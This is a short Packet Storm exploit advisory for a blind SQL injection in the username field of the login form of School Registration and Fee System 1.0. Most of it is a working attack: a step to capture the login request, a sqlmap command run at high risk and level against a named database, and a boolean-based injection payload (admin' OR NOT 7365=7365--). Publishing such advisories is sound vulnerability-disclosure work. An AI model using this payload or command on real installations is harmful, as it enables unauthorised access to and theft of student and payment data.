School Registration And Fee System 1.0 SQL Injection

School Registration and Fee System version 1.0 suffers from a remote blind SQL injection vulnerability.


MD5 | e7d2ffd603c7340148e78206e9763d13

Download
# Exploit Title: School Registration and Fee System | 'username ' Blind SQL Injection 
# Exploit Author: Richard Jones
# Date: 01-04-2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Step 1 - Capture login request
Step 2 - Run Command: sqlmap -r sql.txt --batch --risk 3 --level 3 -D bilal

parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=admin' OR NOT 7365=7365-- enST&password=asd

Source: packetstormsecurity.com
Related Posts